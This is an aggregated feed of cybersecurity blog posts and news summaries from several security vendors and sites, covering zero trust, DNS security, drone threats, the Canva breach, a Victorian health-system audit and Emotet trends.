At Cisco, cybersecurity is our top priority; from product development, to operations, to data protection and privacy, we are embedding security everywhere. Our journey starts with protecting the Cisco enterprise. We invite you to learn more about how we securely enable business for our customers, partners, and ourselves at Cisco Live US, taking place June 9th through the 13th in San Diego, CA.

The sessions listed below will help participants to build a more secure network foundation for their enterprise. Specific topics to be covered include, among others

  • Trustworthy solutions
  • Security analytics
  • Threat intelligence
  • Cloud security
  • Endpoint protection
  • Secure access
  • Data protection and privacy
  • Privacy engineering

Attacks on Network Infrastructure: Protecting Network Integrity with Cisco Trustworthy Tech David Lapier, Sr. Technical Leader of Software Engineering | Monday, June 10th, 1-2 PM

Understanding Encrypted Traffic Using Joy for Monitoring and Forensics Bill Hudson, Sr. Technical Leader of Software Engineering | Tuesday, June 11th, 3-3:45 PM

Securely Enabling Your Organization Steve Martino, Chief Information Security Officer | Wednesday, June 12th, 11-11:40 AM

Inside Cisco IT: How to Move to the Cloud David Jones, Information Technology Architect & Jason Freeth, Information Security Architect | Wednesday, June 12th, 4-5:30 PM

Privacy by Design Lisa Bobbitt, Data Privacy Architect, Jonathan Fox, Data Privacy Director, & Mike Tibodeau, Data Protection & Privacy Operations Manager | Thursday, June 13th, 9:30-11:30 AM

Join us for world-class technical and cybersecurity training and enjoy the fun social activities in store.

The post Cisco Security & Trust at Cisco Live US appeared first on Cisco Blog.

The Importance of Protecting Cybersecurity Whistleblowers

Interesting essay arguing that we need better legislation to protect cybersecurity whistleblowers.

Congress should act to protect cybersecurity whistleblowers because information security has never been so important, or so challenging. In the wake of a barrage of shocking revelations about data breaches and companies mishandling of customer data, a bipartisan consensus has emerged in support of legislation to give consumers more control over their personal information, require companies to disclose how they collect and use consumer data, and impose penalties for data breaches and misuse of consumer data. The Federal Trade Commission ("FTC") has been held out as the best agency to implement this new regulation. But for any such legislation to be effective, it must protect the courageous whistleblowers who risk their careers to expose data breaches and unauthorized use of consumers' private data.

Whistleblowers strengthen regulatory regimes, and cybersecurity regulation would be no exception. Republican and Democratic leaders from the executive and legislative branches have extolled the virtues of whistleblowers. High-profile cases abound. Recently, Christopher Wylie exposed Cambridge Analytica's misuse of Facebook user data to manipulate voters, including its apparent theft of data from 50 million Facebook users as part of a psychological profiling campaign. Though additional research is needed, the existing empirical data reinforces the consensus that whistleblowers help prevent, detect, and remedy misconduct. Therefore it is reasonable to conclude that protecting and incentivizing whistleblowers could help the government address the many complex challenges facing our nation's information systems.

Zero Trust Architecture and its Relevance in Cybersecurity

In the world of technology, just as in any other sphere of life, things that were once in vogue have become outdated, and things that are the trend today would soon go out of use. This naturally applies to cybersecurity as well.

Cybersecurity is an area that evolves much faster than many other domains in the world of technology. This is partly because existing technologies are constantly being updated with new versions or replaced with newer ones. This is also partly because cybersecurity firms and experts have to stay ahead of the cybercriminals who are constantly coming up newer and sophisticated kinds of threats and attacks.

Today let’s discuss a rather new technology that has replaced the widely used and much popular Default Allow approach to cybersecurity. The new technology, the Zero Trust architecture is now turning quite popular among modern day enterprises. Let’s examine different aspects of this development and also discuss the relevance of the rapidly evolving Zero Trust architecture.

What’s the issue with Default Allow?

The Default Allow approach to cybersecurity, which was deemed highly effective, works by allowing unknown files and apps to access enterprise networks. The negative aspect of Default Allow is that cybercriminals could exploit it as a fast, easy way to penetrate enterprise networks and then execute malware attacks and data breaches. They could go for Zero Day attacks or ransomware attacks and cause enterprises huge losses. It’s here that Zero Trust architecture gains relevance.

Zero Trust architecture- What’s it?

Zero Trust architecture is, as the name itself suggests, all about not trusting anything that comes into a network. Thus, the IT team works with the supposition that all files and apps are dangerous as long as they are not verified. Hence, they’d employ a set of security systems and software throughout the network, spanning the web, the cloud, the LAN, the endpoints etc to ensure that every single file or application is safe.

How it works?

As already mentioned, the basic underlying principle here is that of zero trust. Everything needs to be verified before being allowed to execute in a network…

Thus, today we have a wide range of Endpoint Protection platforms that help enterprises achieve a Zero Trust architecture by not trusting and always verifying all unknown files. All unknown files that are executed on an endpoint are instantly placed in a container, thereby ensuring uninterrupted service and zero damage to the user. The unknown files in the containment are all analyzed statically and dynamically, in the cloud as well as by human experts. Post analysis, the verdicts are given. 95 percent of verdicts are returned in under 45 seconds while for 5 percent, it might take up to 4 hours. Then, the files are handled accordingly. Those that are found to be safe and let in and those that are unsafe are blocked. To be noted is the fact that those files for which a 100 percent safe verdict cannot be given from a cloud analysis in 45 seconds are immediately escalated to a human analyst, who does a review to determine if the files are safe or malicious. The highlight is that neither productivity nor user experience is impacted as the analysis process happens without being perceived and the users can immediately run files and applications as they are contained and analyzed in the cloud.

The relevance of a Zero Trust architecture

We have always maintained that the human element is of utmost importance in cybersecurity. Every single employee who is part of a corporate network is responsible for the overall security of the network. Still, errors are bound to happen. One or the other employee might by chance click on a link or download an attachment in a phishing email and that one click or one stray download might pave the way for a devastating cyberattack, sometimes a ransomware strike that could cripple the entire network. This, we’d like to mention, is not underestimating the importance of the human element in cybersecurity. It’s just that it’s only human to err, but one single error that’s thus committed could cost dear for a business organization. To err is human, but then, as regards cybersecurity, there’s no point in consoling ourselves by stating that to forgive is divine, because sometimes, the damages done to businesses as a result of small human errors are irreversible.

Similarly, it wouldn’t be proper to trust the IT teams to detect every threat. Their systems too could sometimes fail. We do point out time and again that all security systems have or develop flaws that could be exploited before they are found and fixed.

Thus, it’s important, not just important but highly relevant, that business enterprises seek to empower their workforces, their networks and their IT teams with the Zero Trust mindsets and the architecture that’s needed to support it. The cyberattacks that could happen as a result of depending wholly on Default Allow could have disastrous consequences and hence we need to go for the Zero Trust architecture, for better protection and data security.

Also, Read

Penetration Testing The Most Visible Component of Cyber Security

Importance of Employee Awareness and Training For Cyber Security

Cyber security and strategy

 

The post Zero Trust Architecture and its Relevance in Cybersecurity appeared first on .

Scientists uncover vulnerability in FPGAs, affecting cloud services and IoT

Field-programmable gate arrays (FPGAs) are, so to say, a computer manufacturer’s “Lego bricks”: electronic components that can be employed in a more flexible way than other computer chips. Even large data centers that are dedicated to cloud services, such as those provided by some big technology companies, often resort to FPGAs. To date, the use of such services has been considered as relatively secure. Recently, however, scientists at Karlsruhe Institute of Technology (KIT) uncovered potential … More

The post Scientists uncover vulnerability in FPGAs, affecting cloud services and IoT appeared first on Help Net Security.

How likely are weaponized cars?

It is easy to become absorbed by the exaggerated Hollywood depictions of car hacking scenarios – to imagine a not-so-distant future when cars or their supporting infrastructures are hacked by criminals or terrorists and turned into lethal weapons. There are reasons why such a scenario has not happened yet. But could it? And if so, how can we prevent it? Some might argue that the likelihood of cars being weaponized is extremely low, but from … More

The post How likely are weaponized cars? appeared first on Help Net Security.

Why zero trust is crucial to compliance

The enterprise faces a brand new world when it comes to data privacy and security. New regulations like the General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA) have joined PCI-DSS, HIPAA, and more than 25,000 other cybersecurity regulations passed since 2008. Together, these regulations have vastly increased the workload on security teams already stretched thin by the sheer scale and complexity of modern software business services. The challenge posed by these … More

The post Why zero trust is crucial to compliance appeared first on Help Net Security.

Cloud migration journey is more complex than anticipated for innovation and efficiency

Two-thirds of large enterprises are not realizing the full benefits of their cloud migration journeys identifying security and the complexity of business and operational change as barriers, according to Accenture. Based on a survey of 200 senior IT professionals from large businesses worldwide, the report — “Perspectives on Cloud Outcomes: Expectation vs. Reality” — suggests that the cloud migration journey is more complex than anticipated for innovation and efficiency. While the vast majority of companies … More

The post Cloud migration journey is more complex than anticipated for innovation and efficiency appeared first on Help Net Security.

Discussing Different Aspects of Next-Level Network Security

Cybersecurity, as an industry, is changing and evolving at a rapid pace. As cybercriminals come up with all kinds of new approaches to target and breach computer networks, it’s becoming increasingly difficult to protect systems and networks using even DNS security technologies.

Today, we have moved much ahead in the cybersecurity industry and we have started using next-generation firewalls to ensure comprehensive security. At this juncture, it would be highly relevant to discuss DNS security.

As we know, DNS security helps individual users and organizations ensure better overall security while on the internet. DNS traffic is always permitted to pass through all kinds of firewalls. Cybercriminals, who are always on the lookout for security holes, are only too happy to make use of such points of exposure that DNS security infrastructures provide. They come up with different kinds of exploits, in addition to the denial of service attacks, targeting DNS security. These include exploits like cache poisoning and amplification attacks. Thus, it becomes increasingly important that ISPs (Internet Services Providers) and cloud providers take concrete steps to ensure better and more comprehensive DNS security.

ISPs today need to focus on two critical areas in their network- the DNS caching servers and the authoritative DNS servers. They must focus on protecting these two critical areas from cyberattacks.

Today, when ISPs come up with different kinds of innovative packaging offers and data space to lure subscribers and when there is an increasing client demand for bandwidth as well as applications, the cloud is seen as the best answer to such rising demands. ISPs, while incorporating and centralizing services on the cloud, seek to bring greater agility by embracing server virtualization technologies and also using them on cloud management platforms. Thus, when things are moving on to the cloud- to the virtual space, it calls for a different kind of thinking and implementation. There needs to be a dynamic change as regards providing and ensuring visibility, control and manageability of different network capacities as ISPs are taking to the cloud.

The kind of network automation solution that we need today must be dynamic as regards the capabilities offered. We should have solutions that take care of DNS security in the first place, plus advanced IP address management. There needs to be greater visibility into virtual machines and network administrators should have a good view of and into the cloud assets that they are to deal with. Similarly, there needs to be a fast deployment of applications and better adaptability.

Let’s now discuss certain aspects pertaining to the management of DNS services in this rather dynamic and much-changed scenario, when organizations are moving their public authoritative DNS services to cloud providers’ managed DNS services…

Firstly, organizations need to ensure that their DNS security is redundant. This is because the failure of non-redundant DNS servers could cause big impacts on businesses.

Secondly, if an organization with its authoritative DNS servers in one location services a worldwide environment, it would be ideal to depend on a cloud provider with various differing DNS security for high accessibility and insurance. This is because the resolvers around the globe for such an organization would face added inactivity as they are distant from the location to fulfill queries.

Thirdly, it’s best for organizations to adopt DNSSEC (Domain Name System Security Extensions), which provides a cryptographic strategy for verifying DNS records, thereby providing better DNS security.

And finally, for organizations that depend on cloud providers, it would be rather easy to absorb and mitigate the effects of DDoS attacks on their DNS security. Cloud providers would have a greater capacity to scale up with DDoS attacks whereas for an organization, it won’t be cost-effective to deploy the highly scalable DNS security infrastructure that’s needed to absorb such an attack. Cloud providers, on the other hand, have higher transfer speed plus various assets and would also have the capacity to scale up their resources, based on transaction volume, to counter such attacks.

Related Resources:

DNS Servers | How to Secure DNS Servers from hacker attacks?

How To Deal With DNS Vulnerabilities?

Ten Best Network Scanning Tools for Network Security

The post Discussing Different Aspects of Next-Level Network Security appeared first on .

Corporate IT Security Starts With Simple Policies

Frequent readers of hackercombat.com should be fully aware by now that cybercriminals of all sizes mean serious business. The old days of script kiddies vandalizing a website or pulling off a publicity stunt for their 15-minute of fame online are a rare occurrence these days. Cybercriminals are enticed by the real plausibility of profiting from their operations, there is money from data stored in a database of any company. Cybercrime tends to increase intensity and sophistication, especially if the victim is an actual prime target. Spear phishing, deliberate virus infections, infiltration, and corporate/industrial espionage are regular campaigns, most especially if the cybercriminals are funded by a nation-state, as we sometimes report here in hackercombat.com

So what can a company do to mitigate the risks? To formulate mitigations without causing the ban of BYOD (Bring Your Own Device) which is highly productive for employees nor disabling the Internet connection for IoT (Internet-of-Things) devices. For any network administrator worth his salt will tell you, the more uniform the devices connected to the corporate network, the lesser the attack surface. Of course, it is no longer possible to ban personal smartphones in the workplace, given that leaders and the management team of companies use their personal devices for business use as well. IT team just have to find an alternative way to secure the enterprise network without enforcing cut-throat restrictions all over the place in the name of security.

There is no 100% security, and even us here at hackercombat.com can never claim that 100% security is achievable. In this article, we provide you a list of tips on how to increase corporate security without the company breaking the bank and easy to implement:

Define computers that do not require an Internet connection

Not all computers in the enterprise require an Internet connection, in fact, some computers that perform critical 24/7 task do not require a network connection. These machines run specific applications, produce a specific deliverable critical for the organization. There should be regular audit what are the computers that fall in this category, determine if they require connection or remain air-gapped for the rest of the cycle.

Build and keep an updated inventory

Having the updated inventory provides a good baseline in determining the best IT policy, what restrictions can be enforced which will be acceptable for everyone. With a good knowledge of the inventory, problematic equipment can easily be identified, quarantined and if necessary removed from the network (in case of malware infection).

Empower the leadership team with cybersecurity awareness

The leadership team, including the company’s board of directors and the rest of the staff members below them, should all be aware of cybersecurity risks. As the leadership team formulates corporate-level decisions, one wrong decision may cause a troubled brand and long term damaged customer confidence.

Be transparent with IT security policy

All policies that will be enforced need to be written, making it part of the employee’s handbook is even an advantage. The moment a newly hired employee steps into the organization, IT policies are made known. This prevents a gap between the employee and the employer when it comes to standard policies governing the office.

Keep software updated across the organization

This takes a lot of effort for the IT team to implement but must be done without any compromise. The company may allow a certain level of deferred updates in a small-scale for those that critically needs to finish a certain project or task, but that should not be an exemption for non-installation of software updates.

Use Open Source software as much as possible

Unlike the proprietary software, open source software is quickly patched with new updates as soon as a version with a fixed known issue is released. In the open source world, there is no need to wait for a “Patch Tuesday” in order to receive a fixed version of the buggy software. Patches are released as soon as the developers implemented the solution to the bug, security or feature-wise.

Also, Read:

IT Security Procedures You Should Not Forget After Electronic Gadget Shopping

Women Empowerment in Technology and IT Security Pushed

IT Security Culture Evolution of Businesses Exposed

Worldwide IT Security Spending to Hit $114bn This Year: Gartner Forecast

IT Security Pros Are Sure Feeling The Heat Of Modern Attacks

The post Corporate IT Security Starts With Simple Policies appeared first on .

5G Technology and Cybersecurity Concerns

5G is a modern reality, and people don’t connect it with the future concept anymore. As leading network operators announce the beginning of this new era of smart connectivity at the Mobile World Congress, that 5G will be calling the shots when it comes to shaping the future.

However, in the midst of this craze, the IT community speculated on the implications of the 5G version, wondering what exactly that means for the cybersecurity landscape. Taking a cue from history what we have learned so far is that advanced technology and adoption are a double-edged sword, which can quickly build and destroy. As reported in a recent Gartner report, in less than a year, two-thirds of companies plan to implement 5G, so it’s imperative that they prepare for a new wave of cyber threats, which will be launched on the already vulnerable environment.

Cybersecurity concerns of the 5G world

And yet this exciting new 5G world will have its share of cybersecurity challenges. Cybercriminals around the world will continue to look for ways to access user data. With billions of devices connected to the internet, they have a large attack surface to the weak link in the security chain.

In addition, the ability of hackers to cause damage and destruction is increasing exponentially. In today’s 4G world, a huge network of bots can be used on devices at home to trigger huge DDoS attacks on websites. In tomorrow’s 5G world, the same bot network could be used to eliminate a complete network of cars driving in a single city, causing chaos on the roads.

Of course, computer security is as important in the 5G world as in the 4G world – and maybe even more. A huge amount of remote sensors and smart devices connected, for example, to global supply chains will greatly increase the complexity of protecting corporate networks from intruders. The huge amount of data generated by 5G networks makes it difficult to detect deviations in the users’ behavior by hackers.

Basically, 5G is exposed to the same potential risks as its predecessors: authentication, accessibility, data security, and privacy. Since the different specifications of the 5G protocol have been transmitted by 3G and 4G networks, the vulnerabilities of these previous generations are also supported. Network degradation attacks represent a comparable and significant risk; the lack of authentication in the initial connection phase may allow opponents to downgrade the network to a 4G or 3G target so that they can exploit existing vulnerabilities.

As with any innovation, 5G will have its own share of cases in the vertical industries that require a modern level of security. Although technology offers a number of new opportunities for consumers and can transform both public and private sector industries, it is essential that cybersecurity remains at the forefront of any phase of the implementation process.

Also, Read:

The Future of Web Filtering in the Era of 5G Networks

EU’s G5 Technology Roll-out In The Age Of Anti-Huawei Publicity

Australia Doesn’t Want Huawei And Zte For Their 5G Networks

The post 5G Technology and Cybersecurity Concerns appeared first on .

Cybersecurity and Drones – A Rising Threat?

Drones, which are part of the UAV (unnamed aerial vehicles) group, have certainly seen an increase in popularity in the past few years. The global drone market is expected to grow from $14 billion in 2018 to over $43 billion in 2024. Long gone are the days when drones were only used for military purposes – today they can basically be purchased and flown by anyone. They can be affordable, come in all sizes, and can get as sophisticated as you can imagine.  

Drones are now used for a multitude of purposes, ranging from recreational use, photography and filmmaking, agriculture, to surveillance and so many other uses. This technology will soon even be utilized by Amazon to deliver small packages, has already been employed by Domino’s to bring pizza, and UPS has used it to ship medical samples in the US. 

But technology like this can equally be used for good and bad purposes and could easily turn into a sci-fi nightmare. And one of the biggest concerns here is that drones can be hacked, or other drones can be used to hack electronic devices and gather data without one’s consent. 

The malicious uses of drones 

Drones can become a threat to your privacy since they can be used as spying devices. 

Numerous cases have been reported so far. To name a few, a couple flew a drone to watch their neighbors and ended up being arrested, and burglars are now reportedly using drones to scout houses they intend to rob.  

Privacy-related incidents may be so common since many countries don’t have any drone laws in place, or drone users are simply unaware of them. But there are some countries that did release regulations. For example, the UK is currently in the process of updating their Drones Billmost probably as a response to the famous Gatwick Airport incident, when drone sightings stopped 1,000 flights from December 19-21, 2018 and affected the travel plans of around 140,000 people. The United States has also released regulations for drone users, and you can go through them here if you are flying your drones in the US. 

Some drones can even see through walls by employing Wi-Fi and 3D imaging, and could easily create 3D plans of building that could facilitate criminals’ access inside them. 

Not only that, other prominent issues are related to cyber-attacks, which may have seemed impossible to happen in the past but could now be carried out using drone technology. Drones can now be used to hack servers, spy on networks, extract data, and block communications.  

Corporate networks can be heavily affected by the malicious use of drones, so companies need to have solid security measures in place to prevent unwanted access and protect themselves from cyber warfare attacks. 

How hackers steal data with drones

Attackers can attach a small computer (such as Raspberry Pi) to a drone, fly it over places where they wouldn’t normally be able or allowed to enter, and then exploit Wi-Fi, Bluetooth, or RFID (Radio-frequency identification) vulnerabilities. 

A cybersecurity company proved that a drone could basically be connected to any devices, like smartphones or laptops, during the 2014 Black Hat security conference in Singapore. They used a drone to intercept data from the attendees’ phones with a software dubbed Snoopy that ran on the minicomputer attached to the drone. It could mimic Wi-Fi networks that victims were connected to in the past and then they were able to steal any information that was used on the device, including bank details and passwords 

Also, other sources have shown that drones equipped with a radio transceiver could be used to hijack Bluetooth mice. This means that any other Bluetooth-connected devices could be accessed, such as keyboards, from which attackers could obtain keystrokes and figure out users’ login credentials. 

Your own drone could be hacked easily 

Imagine you are flying your drone, planning to take breathtaking shots of the spectacular location you are exploring and all of a sudden, the drone crashes and hits the ground. Or worse, it starts flying into random people and injures them.  

One way this could happen is through GPS spoofing. This practice involves tricking a GPS receiver by transmitting a fake GPS signal. As a result, the drone will use the wrong location.  

How malicious drones can be stopped  

The market size of the anti-drone market is expected to reach $1.85 billion by 2024, which proves the fact that significant efforts are being made to fight hostile drones.  

For instance, researchers funded by the EU are trying to find ways to detect and disable malicious drones through the KNOX project. Additionally, a recent study conducted by Fujitsu System Integration Laboratories and the Ben-Gurion University of the Negev addresses the same issue and analyzes methods to detect drones. What’s more, companies AT&T and Dedrone (a drone detection technology start-up) are collaborating to develop IoT solutions against malicious drones.  

Below I’ve included a few methods used to detect rogue drones: 

Source 

1. Geofencing  

Geofences are virtual boundaries set up within physical locations where drones can be detected when they reach certain delimited areas.  

How does geofencing work 

This is a location-based service and can be set up using GPS, Wi-Fi, Bluetooth, cellular data or RFID. In order to use geofencing, a developer or admin must create a virtual border around a specified location in GPS or RFID-enabled software. It’s quite a simple operation and can be represented, for example, by a circle drawn around a location on Google Maps. Technically, the geofence should generate a response to the moment an unauthorized drone enters the defined area.  

However, this technology may not always be so efficient 

Regular drones have built-in geofencing software, so you can’t unknowingly fly them over restricted areas, but malicious actors could build their own devices without this software or even hack the standard ones. Apparently, there is a website (on the open internet, not on the dark webthat sells hacks for drones manufactured by DJI, the market leader in unmanned aerial vehicles. The hackers’ solutions remove geofencing, altitude, and speed limitations. 

2. Radar 

Radar is already the standard go-to mechanism for aerial vehicles detection, so drones can also be detected using radar detection systems. 

Drone radars use a combination of noise detection, thermal detection, radio signal detection, and signal identification. However, this method is not fully accurate, as it can easily mistake birds for drones. 

Additionally, some drone radars also use microphones to recognize noise patterns, but this has proved to be ineffective in noisy urban areas. 

3. Acoustic sensors 

These sensors are able to detect drones that sometimes can’t be seen by radars.  

Acoustic sensors recognize the unique sounds generated by different drone types and run them against a sound signatures database. If there’s a match, the system triggers an alert.  

Source 

4. RF Scanners 

Radio-frequency scanners examine the electromagnetic spectrum and find the specific transmissions from drones.  

However, RF scanners will work when radio signals are present. Some drones operate without any RF signals and only rely on GPS, so this method will, in some cases, be inefficient.  

Source 

5. Thermal imaging 

Thermal drones use vision imaging cameras that work by detecting heat emitted by almost all objects and materials.  

So, drone thermal cameras could prove to be powerful tools to detect unwanted UAVs.  

Of course, there are many other methods out there (including hybrids) that are meant to stop malicious drones, which I haven’t mentioned in this article. Here are some more resources I recommend you check out if you want to become an anti-drone expert: 

To Sum Up 

Drones are certainly impacting our daily lives and will, without doubt, make up an important part of the IoT network used in our future smart cities. But sadly, they can be easily misused for malicious purposes. So, a lot of effort should be put into their cybersecurity and using the proper ways to detect and take down the ones which are threatening us.  

What is your opinion on the issues related to drones and cybersecurity? Share your thoughts in the comments section below. 

The post Cybersecurity and Drones – A Rising Threat? appeared first on Heimdal Security Blog.

What mechanisms can help address today’s biggest cybersecurity challenges?

In this Help Net Security podcast, Syed Abdur Rahman, Director of Products with unified risk management provider Brinqa, talks about their risk centric knowledge-driven approach to cybersecurity problems like vulnerability management, application security and cloud and container security. Here’s a transcript of the podcast for your convenience. Hi, my name is Syed Abdur and I’m the Director of Products at Brinqa, where I’m responsible for product management and technical product marketing. Brinqa is a cyber … More

The post What mechanisms can help address today’s biggest cybersecurity challenges? appeared first on Help Net Security.

A veteran’s look at the cybersecurity industry and the problems that need solving

For many in the infosec industry, Daniel Miessler needs no introduction, as he’s a 20-year industry veteran, a professional that fulfilled a variety of security roles at companies like HP and IOActive, a leader of the OWASP IoT Security Project and, most prominently, the author of the popular Unsupervised Learning podcast, newsletter and blog. Apart from effectively curating and summarizing content produced by others, Miessler is also the source of interesting ideas and occasionally unorthodox … More

The post A veteran’s look at the cybersecurity industry and the problems that need solving appeared first on Help Net Security.

Majority of CISOs plan to ask for an increase in cybersecurity investment

Most CISOs of financial institutions (73 percent) plan to ask their organization’s CFO for an increase in cybersecurity investments in the next year, according to the Financial Services Information Sharing and Analysis Center (FS-ISAC), an industry consortium dedicated to reducing cyber-risk in the global financial system. “The advancement and adoption of new technologies coupled with increased geopolitical tension has fueled a rapidly evolving cyber threat landscape,” said Steve Silberstein, CEO of FS-ISAC. “An effective cybersecurity … More

The post Majority of CISOs plan to ask for an increase in cybersecurity investment appeared first on Help Net Security.

Security overconfidence and immaturity continue to endanger organizations

The majority of organizations are ill-prepared to protect themselves against privileged access abuse, the leading cyber-attack vector, according to Centrify and Techvangelism. Seventy-nine percent of organizations do not have a mature approach to Privileged Access Management (PAM), yet 93% believe they are at least somewhat prepared against threats that involve privileged credentials. This overconfidence and immaturity are underscored by 52% of organizations surveyed stating they do not use a password vault, indicating that the majority … More

The post Security overconfidence and immaturity continue to endanger organizations appeared first on Help Net Security.

New initiative aims to strengthen IoT security, interoperability and reliability

The Zigbee Alliance publicly announced a major ongoing initiative to make smart home and IoT products easier to develop, deploy, and sell across ecosystems. The All Hubs Initiative is driven by a Zigbee Alliance workgroup comprised of leading IoT companies including Amazon, Comcast, Exegin, Kwikset, Landis+Gyr, LEEDARSON, Legrand, MMB Networks, NXP, OSRAM, Schneider Electric, Silicon Labs, Somfy, and many others with the goal of improving interoperability between IoT devices and major consumer and commercial platforms. … More

The post New initiative aims to strengthen IoT security, interoperability and reliability appeared first on Help Net Security.

Businesses are struggling to implement adequate IAM and PAM processes, practices and technologies

Businesses find identity and access management (IAM) and privileged access management (PAM) security disciplines difficult yet un-concerning. The results infer that IAM- and PAM-related security tasks may be deprioritized or neglected, potentially exposing organizations to data breaches and other cyber risks. Conducted at RSA Conference in early March 2019, One Identity’s study polled 200 conference attendees on their biggest security challenges and concerns, as well as their workplace behaviors related to network and system access. … More

The post Businesses are struggling to implement adequate IAM and PAM processes, practices and technologies appeared first on Help Net Security.

Many are seeing the damage of cybercrime and identity theft firsthand

As massive data breaches continue to make international headlines and the Internet is an integral part of our daily lives, consumers are now grasping the risks they face. In a new F-Secure survey, 71% of respondents say they feel that they will become a victim of cybercrime or identity theft, while 73% expressed similar fears about their kids. “These findings are absolutely staggering and show many people are seeing the damage of cybercrime or identity … More

The post Many are seeing the damage of cybercrime and identity theft firsthand appeared first on Help Net Security.

Attention Graphic Designers: It’s Time to Secure Your Canva Credentials

Online graphic design tools are extremely useful when it comes to creating resumes, social media graphics, invitations, and other designs and documents. Unfortunately, these platforms aren’t immune to malicious online activity. Canva, a popular Australian web design service, was recently breached by a malicious hacker, resulting in 139 million user records compromised.

So, how was this breach discovered? The hacker, who goes by the name GnosticPlayers, contacted a security reporter from ZDNet on May 24th and made him aware of the situation. The hacker claims to have stolen data pertaining to 1 billion users from multiple websites. The compromised data from Canva includes names, usernames, email addresses, city, and country information.

Canva claims to securely store all user passwords using the highest standards via a Bcrypt algorithm. Bcrypt is a strong, slow password-hashing algorithm designed to be difficult and time-consuming for hackers to crack since hashing causes one-way encryption. Additionally, each Canva password was salted, meaning that random data was added to passwords to prevent revealing identical passwords used across the platform. According to ZDNet, 61 million users had their passwords encrypted with the Bcrypt algorithm, resulting in 78 million users having their Gmail addresses exposed in the breach.

Canva has notified users of the breach through email and ensured that their payment card and other financial data is safe. However, even if you aren’t a Canva user, it’s important to be aware of what cybersecurity precautions you should take in the event of a data breach. Check out the following tips:

  • Change your passwords. As an added precaution, Canva is encouraging their community of users to change their email and Canva account passwords. If a cybercriminal got a hold of the exposed data, they could gain access to your other accounts if your login credentials were the same across different platforms.
  • Check to see if you’ve been affected. If you’ve used Canva and believe your data might have been exposed, use this tool to check or set an alert to be notified of other potential data breaches.
  • Secure your personal data. Use a security solution like McAfee Identity Theft Protection. If your information is compromised during a breach, Identity Theft Protection helps monitor and keep tabs on your data in case a cybercriminal attempts to use it.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Attention Graphic Designers: It’s Time to Secure Your Canva Credentials appeared first on McAfee Blogs.

Victoria’s Public Health System “Highly Vulnerable”: Report

Victoria’s public health system is “highly vulnerable” to a Singapore-like data breach, according to a recent report.

As per an auditor general report released recently, the public health system in Victoria is vulnerable to an attack like the one that Singapore had experienced last year. The Singapore data breach had led to the exfiltration of almost 1.5 million patient health records.

The report by the auditor general reads, “Victoria’s public health system is highly vulnerable to the kind of cyberattacks recently experienced by the National Health Service (NHS) in England, in Singapore, and at a Melbourne‐based cardiology provider, which resulted in stolen or unusable patient data and disrupted hospital services.”

The report further explains that there are key weaknesses in the “physical security” and “logical security” of the health services. This includes critical aspects like password management and other user access controls. Low data security awareness among the staff, which increases the success of social engineering attacks (like phishing or tailgating into corporate areas where ICT infrastructure and servers may be located), is also highlighted in the report.

The audit covered four health services, namely Barwon Health (BH), the Royal Children’s Hospital (RCH), and the Royal Victorian Eye and Ear Hospital (RVEEH), plus two different areas of the DHHS (Department of Health and Human Services). The auditor-general’s team managed to exploit security vulnerabilities and access patient data in all the four agencies.

The report notes, “The audited health services are not proactive enough, and do not take a whole‐of‐hospital approach to security that recognises that protecting patient data is not just a task for their IT staff.”

It was also noted that health services relied on external services providers, but at the same time, they were not fully aware of the security controls implemented by the platforms that these providers were using.

“The three audited health services are not fully aware of whether their service providers have the necessary security controls. Due to the sector’s reliance on third‐party vendors, health services need to actively monitor vendor performance to ensure that patient data is safe, ” says the report.

Victoria’s public health services, which manage their ICT systems independently, is supported as regards cybersecurity by DHHS’s Digital Health branch, which develops guidance materials, runs awareness and training sessions and funds ICT infrastructure upgrades. A set of 72 baseline cybersecurity controls, which health services need to implement by 2020-21, have also been developed. But none of the public health services in. Victoria has fully implemented these 72 controls to date. They cite different reasons for this.

The audit report explains, “While Digital Health has set a clear roadmap for health services to follow, to date no health service has fully implemented the 72 controls. The audited health services advise that barriers to implementing the controls include a lack of dedicated cybersecurity staff and insufficient resources for ICT projects.”

“While it may be challenging for health services to balance ICT security against clinical projects, implementing all the controls will provide health services with strong baseline protection against cybersecurity risks. Recent, local examples of cyberattacks in health services demonstrate the need for this work to occur, ” the report points out.

That there are no penalties for non-compliance is also perhaps one of the reasons for the slow implementation of the controls,

The audit report has brought to light issues pertaining to access control management. It found unused as well as terminated employee accounts that were still enabled and also found a lack of regular user access reviews. The health services did not keep user access forms, which are needed to authenticate users. The audit also revealed that many passwords, even on administrator accounts, were easily hackable. Some of these were even system default ones. It was also found that health services rarely used multi‐factor authentication, even for ICT staff and administrator accounts.

The report from the Auditor-General’s office also includes a detailed list of recommendations to be followed.

Related Resources:

How Financial Apps Could Render You Vulnerable to Attacks

Vulnerable Legacy Systems Used By Banks, Need A Careful Review

MacOS AirMail 3 App, Vulnerable to Email Leaks

Are Apps Like Slack And Dropbox Actually Vulnerable To Attack?

The post Victoria’s Public Health System “Highly Vulnerable”: Report appeared first on .

When it comes to email-based threats, Emotet dominates

Emotet displaced credential stealers, stand-alone downloaders and RATs and became the most prominent threat delivered via email, Proofpoint has shared. According to the firm’s statistics, in Q1 2019 a whooping 61 percent of all malicious payloads distributed via email were Emotet. The nature of the malicious payloads Emotet started its life as a banking Trojan, but has morphed over time and became a malware multi-tool, capable of downloading additional malware, stealing passwords, performing brute-force attacks … More

The post When it comes to email-based threats, Emotet dominates appeared first on Help Net Security.

IoT cyberattacks are the new normal, the security mindset isn’t

Eight in ten organizations have experienced a cyberattack on their IoT devices in the past 12 months, according to new research by Irdeto. Of those organizations, 90% experienced an impact as a result of the cyberattack, including operational downtime and compromised customer data or end-user safety. This demonstrates the security limitations of many IoT devices and the need for organizations to think carefully about a cybersecurity strategy amidst an IoT deployment. The impact of IoT … More

The post IoT cyberattacks are the new normal, the security mindset isn’t appeared first on Help Net Security.

UK’s FOI Request Exposes British Government Cybersecurity Weaknesses

Through the United Kingdom’s Freedom of Information, data and statistics that used to be state-secrets are exposed for public consumption and appreciation. It opens the venue for people from all walks of life to have their individual insights on how the former superpower manages its affairs, for or against its national agenda. Private companies may also request the UK government about the information that used to be considered as a “security sensitive”, making them public documents for anyone to check.

